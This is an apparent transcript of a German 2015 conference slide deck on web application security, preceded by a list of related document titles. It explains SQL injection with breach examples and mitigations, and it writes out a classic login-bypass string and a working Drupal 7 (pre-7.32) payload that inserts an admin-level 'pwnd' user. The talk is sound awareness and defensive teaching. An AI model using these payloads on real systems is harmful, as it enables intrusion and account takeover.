Sicher sein, statt in Sicherheit wiegen Sicherheit bei. Web-Anwendungen. Vortrag bei Infotech 08.06.2015

Ähnliche Dokumente
Kulturobjekte der Donau Das ContentManagementSystem (CMS)

Leichte-Sprache-Bilder

Bernadette Büsgen HR-Consulting

Zugang zum Online-Portal mit Passwort Benutzeranleitung (Stand 01/2015)

POP -Konto auf iphone mit ios 6 einrichten

Schnödewindchens Werkstatt Dipl. Ing. Barbara Schnödewind Kabelstrasse Mönchengladbach

Datenbank LAP - Chefexperten Detailhandel

Sie finden im Folgenden drei Anleitungen, wie Sie sich mit dem Server der Schule verbinden können:

Hacker-Methoden in der IT- Sicherheitsausbildung. Dr. Martin Mink

Statuten in leichter Sprache

Diese Anleitung enthält Anweisungen, die nur durch erfahrene Anwender durchgeführt werden sollten!

Instruktionsheft für neue Webshop Hamifleurs

mysql - Clients MySQL - Abfragen eine serverbasierenden Datenbank

oder ein Account einer teilnehmenden Einrichtung also

Anleitung Outlook 2002 & 2003

Firmware-Update, CAPI Update

Anleitung für die Version von online 1. Schritt: Rufen Sie die Website auf...

Partnerportal Installateure Registrierung

Informationen zum Ambulant Betreuten Wohnen in leichter Sprache

Wichtig ist die Originalsatzung. Nur was in der Originalsatzung steht, gilt. Denn nur die Originalsatzung wurde vom Gericht geprüft.

Entwicklung des Dentalmarktes in 2010 und Papier versus Plastik.

Wenn Sie das T-Online WebBanking das erste Mal nutzen, müssen Sie sich zunächst für den Dienst Mobiles Banking frei schalten lassen.

Herzlich willkommen zur Kurzvorlesung: Die häufigsten Fehlerquellen bei der Erstellung von Webapplikationen. Udo H. Kalinna. Nürnberg, den

Installationsanleitung Webhost Windows Compact

Agentur für Werbung & Internet. Schritt für Schritt: -Konfiguration mit Apple Mail

Was meinen die Leute eigentlich mit: Grexit?

Benutzerhandbuch - Elterliche Kontrolle

Mit dem Tool Stundenverwaltung von Hanno Kniebel erhalten Sie die Möglichkeit zur effizienten Verwaltung von Montagezeiten Ihrer Mitarbeiter.

Ihre Interessentendatensätze bei inobroker. 1. Interessentendatensätze

Synchronisations- Assistent

Den Durchblick haben. VOLKSBANK BAD MÜNDER eg. Online aber sicher: Unsere Produkt- und Sicherheitshotline hilft und informiert

* Leichte Sprache * Leichte Sprache * Leichte Sprache *

Anleitung für die Online-Bewerbung über LSF auf Lehrveranstaltungen aller Lehramtsstudiengänge

Karten-Freischaltung mit dem UNLOCK MANAGER

s aus -Programm sichern Wählen Sie auf der "Startseite" die Option " s archivieren" und dann die entsprechende Anwendung aus.

Was ist Sozial-Raum-Orientierung?

SCHRITT 1: Öffnen des Bildes und Auswahl der Option»Drucken«im Menü»Datei«...2. SCHRITT 2: Angeben des Papierformat im Dialog»Drucklayout«...

Das Leitbild vom Verein WIR

Stellvertretenden Genehmiger verwalten. Tipps & Tricks

Herzlich willkommen bei tetraguard Ihrem Spezialisten für Sicherheitssoftware!

Professionelle Seminare im Bereich MS-Office

Deutsches Rotes Kreuz. Kopfschmerztagebuch von:

Schritte 4. Lesetexte 13. Kosten für ein Girokonto vergleichen. 1. Was passt? Ordnen Sie zu.

PHP - Projekt Personalverwaltung. Erstellt von James Schüpbach

2) Geben Sie in der Anmeldemaske Ihren Zugangsnamen und Ihr Passwort ein

Zahlung der Vermittleraufsichtsgebühr per Kreditkarte

s- Sparkasse Die Ausbildung ist schon mal gesichert! Die Sparkassen-KinderleichtVorsorge. Sparkassen-Finanzgruppe

Manuel Schmalz. Abteilungsleiter Vertragsmanagement. Düsseldorf,

Anlage eines neuen Geschäftsjahres in der Office Line

Internationales Altkatholisches Laienforum

I. Travel Master CRM Installieren

Pflegefall wer bezahlt, wenn es ernst wird?

Benutzerhandbuch. Leitfaden zur Benutzung der Anwendung für sicheren Dateitransfer.

Kurze Anleitung zum Guthaben-Aufladen bei.

AGROPLUS Buchhaltung. Daten-Server und Sicherheitskopie. Version vom b

macs Support Ticket System

MARCANT - File Delivery System

Anmelden und Vorträge einreichen auf der JBFOne-Website Inhalt

FAQ Verwendung. 1. Wie kann ich eine Verbindung zu meinem virtuellen SeeZam-Tresor herstellen?

Installation von horizont 4 bei Verwendung mehrerer Datenbanken

Gründe für fehlende Vorsorgemaßnahmen gegen Krankheit

Antrag auf Pauschal-Förderung Aus dem Hamburger Selbsthilfe-Gruppen-Topf

Orientierungstest für angehende Industriemeister. Vorbereitungskurs Mathematik

Anleitung für die Einrichtung weiterer Endgeräte in 4SELLERS SalesControl

OutLook 2003 Konfiguration

SWOT Analyse zur Unterstützung des Projektmonitorings

Da unser Girokonto kostenlos ist, können Sie sich woanders etwas mehr gönnen.

1. Einleitung Abfrage des COON-Benutzernamens Ändern des Initial-Passwortes Anmelden an der COON-Plattform...

D a s P r i n z i p V o r s p r u n g. Anleitung. - & SMS-Versand mit SSL (ab CHARLY 8.11 Windows)

Wir machen neue Politik für Baden-Württemberg

Protect 7 Anti-Malware Service. Dokumentation

SAP Memory Tuning. Erfahrungsbericht Fritz Egger GmbH & Co OG. Datenbanken sind unsere Welt

Einrichtung des Cisco VPN Clients (IPSEC) in Windows7

Horstbox VoIP. Stefan Dahler. 1. HorstBox Konfiguration. 1.1 Einleitung

Wir beraten und vermitteln alle Formen der Kinderbetreuung.

Die Post hat eine Umfrage gemacht

Social Media Einsatz in saarländischen Unternehmen. Ergebnisse einer Umfrage im Mai 2014

Kurzanleitung fu r Clubbeauftragte zur Pflege der Mitgliederdaten im Mitgliederbereich

Erstellen einer digitalen Signatur für Adobe-Formulare

Mediumwechsel - VR-NetWorld Software

Schritt-für-Schritt-Anleitung So verschlüsseln Sie Ihr -Konto in der Software 6.0

Wichtige Forderungen für ein Bundes-Teilhabe-Gesetz

SQL-Injection. Seite 1 / 16

Web Interface für Anwender

COMPUTER MULTIMEDIA SERVICE

Anleitung Selbststudium

Was ist pcon.update? Girsberger Manual Registrierung pcon.update Service - Marketing Edition Sep Seite 1

Willkommen im Online-Shop der Emser Therme GmbH

Checkliste Webauftritt

Anleitung vom 4. Mai BSU Mobile Banking App

Anleitungen zur Konfiguration verschiedener Mailclients und Informationen zu der -Infrastruktur von Hostpoint.

Anleitung Administration Alterssiedlungen Basel. So aktualisieren Sie Ihre Daten. Version:

BitDefender Client Security Kurzanleitung

Konfiguration der tiptel Yeastar MyPBX IP-Telefonanlagen mit Deutsche Telefon Standard AG

Serienbrieferstellung in Word mit Kunden-Datenimport aus Excel

Mensa-Bestellsystem der Grundschule Bienenbüttel

BERECHNUNG DER FRIST ZUR STELLUNGNAHME DES BETRIEBSRATES BEI KÜNDIGUNG

Mach's grün! macht Schule

Transkript:

Sicher sein, statt in Sicherheit wiegen Sicherheit bei Web-Anwendungen Vortrag bei Infotech 08.06.2015

2

Ist Sicherheit bei Web-Anwendungen ein Thema? 3

Zusammenfassung Verizon Data-Breach-Report 2014, 1/2 Web-Anwendungen bleiben der sprichwörtliche Punchbag aus dem Internet. Sie werden in zwei Arten ausgenutzt: 1.) Schwachstellen werden in der Anwendung ausgenutzt (in der Regel unzureichende Eingabeüberprüfung)

Zusammenfassung Verizon Data-Breach-Report 2014, 2/2 2.) Mit Hilfe von gestohlener Anmeldeinformationen werden Identitäten geklaut oder gekapert. Viele der Angriffe im untersuchten Datenbestand 2013 beziehen sich auf fertige off-the-shelf Content-Management-Systeme (zb Joomla!, Wordpress oder Drupal).

Welche Arten von Einbrüchen wurden erfasst? Verizon

Wie wird eingebrochen? Verizon

Was sind die Motive von Einbrechern? Verizon

Wer bricht ein? Verizon

Anzahl der erfassten Fälle Verizon

Warum bricht jemand in Webanwendungen ein? Verizon

Wie lange braucht es, bis der Einbruch entdeckt wird? Verizon

Auswahl der Unternehmen, die an der Statistik mitwirkten Verizon

Es ist nicht eine Frage OB, sondern WANN Sie angegriffen werden Bruce Schneier 15

Aus eigener Erfahrung Fotobuch-Dienstleister Bestellsystem für Firmenkunden 16

Top 10 Sicherheitslücken, OWASP

Einbrüche über SQLi (1) 1999 Hacker Rain Forest Puppy Angriff auf IIS-Webserver mit MS-SQL-DB

Einbrüche über SQLi (2) 10 Jahre später, gleiche Methode Millionen von Kreditkartendaten gestohlen

Einbrüche über SQLi (3) 2007/2008 Hackingopfer: TJX, CC-Abrechnungsfirma 100 Millionen von Kreditkartendaten gestohlen

Einbrüche über SQLi (4) 08.11.2008 9 Mio $ Schaden in 30 Minuten Einbruch in RBS WorldPay an einem Samstag 49 Städte weltweit 130 Bankomaten 100 Kreditkarten 180 Abhebungen pro Karte

Einbrüche über SQLi (5) 2011 Hackingopfer: Sony, Playstation-Netz Schaden: ca. 1 Mrd. $ unmittelbar und insgesamt 24 Mrd. $ Schaden

Einbrüche über SQLi (6) 2011 Hackingopfer: Oracle (DB-Guru, Hersteller von Datenbanken)

Selbsttest

Selbsttest Haben Sie Fähigkeiten als potentieller Hacker?

1+2*x=5

1+2*2=5

1+2*(2)=5

1 + 2 * ( 3-1 ) = 5

1+2* 0 = 1; 5 =5

Was ist SQL-Injection? (SQLi) SQL = Standard Query Language Angriffsart auf Webanwendungen Befehle für die Datenbank werden eingeschleust Datenmanipulation im großen Stil

Abfragebefehl der Datenbank = Formel SELECT * FROM user WHERE name='$name' AND password='$password'

Abfragebefehl der Datenbank = Formel SELECT * FROM user WHERE name='$name' AND password='$password'

Abfragebefehl der Datenbank = Formel SELECT * FROM user WHERE name='$name' AND password='$password' Pseudocode: Wenn (SQL-Abfrage_liefert_name) dann login mit $name sonst Fehlerausgabe: Benutzername oder Passwort falsch Ende

itexperst geheim ;-) SELECT * FROM user WHERE name='itexperst' AND password='geheim'

itexperst ' OR 1=1; -- SELECT * FROM user WHERE name='itexperst' AND password='' OR 1=1; --'

Live-Hacking :-) No.1 38

Live-Hacking, No.2 Drupal 7 (Sicherheitslücke < v. 7.32) 38.757 http 19.035 https davon 29.474 USA 39

name=user01 &pass=pass01 &form_build_id=form-9ycitb32v-aq7b2liv42 K1xrM_KOHLdf LuAJppPOo2I &form_id=user_login_block &op=log+in

name[0;insert%20into%20users%20values %20(99999,'pwnd','$S$DIkdNZqdxqh7Tmufxs8l1v Au0wdzxF//smWKAcjCv45KWjK0YFBg','pwnd@p wnd.pwn','','',null,0,0,0,1,null,'',0,'',null);# %20%20]=test &name[0]=test &pass=test &form_id=user_login_block &op=log+in

name[0;insert%20into%20users%20values %20(99999,'pwnd','$S$DIkdNZqdxqh7Tmufxs8l1v Au0wdzxF//smWKAcjCv45KWjK0YFBg','pwnd@p wnd.pwn','','',null,0,0,0,1,null,'',0,'',null);# %20%20]=test &name[0]=test &pass=test &form_id=user_login_block &op=log+in

Jedes 3. Unternehmen in Ö Quelle: ORF, Ö1 Mittagsjournal vom 24.05.2013 43

In Deutschland ist so gut wie jeder Betrieb Opfer von Cyberattacken - vom Mittelständler bis zum Großkonzern. Das zu verschweigen, hilft nicht mehr weiter. Thomas Tschersich, Sicherheitschef der Deutschen Telekom in ORF III, Themenmontag, Im Visier der Hacker, 23.02.2015 44

47

Abhilfe gegen SQLi Allg. Sicherheit, 5 Schritte zur IT-Sicherheit 48

Abhilfe gegen SQLi Allg. Sicherheit, 5 Schritte zur IT-Sicherheit IT-Penetrationstests 49

Abhilfe gegen SQLi Allg. Sicherheit, 5 Schritte zur IT-Sicherheit IT-Penetrationstests Filterung der Eingabe All input is evil 50

Abhilfe gegen SQLi Allg. Sicherheit, 5 Schritte zur IT-Sicherheit IT-Penetrationstests Filterung der Eingabe All input is evil Prepared Statements 51

Abhilfe gegen SQLi Allg. Sicherheit, 5 Schritte zur IT-Sicherheit IT-Penetrationstests Filterung der Eingabe All input is evil Prepared Statements OWASP Top 10 + Developement Guide 52

office@itexperst.at Subject: Infotech-Geschenk Risiko Hackerangriff: So minimieren Sie die Haftung des Geschäftsführers 53

Wir helfen Ihnen, Ihre Unternehmensdaten abzusichern schnell und sofort

Dipl. Ing. Christian Perst Rupert-Gugg-Str. 53 A 5280 Braunau Gerichtlich beeideter Sachverständiger fon +43 / 77 22 / 98 200 mobile +43 / 699 / 18 19 94 63 Christian.Perst@itEXPERsT.com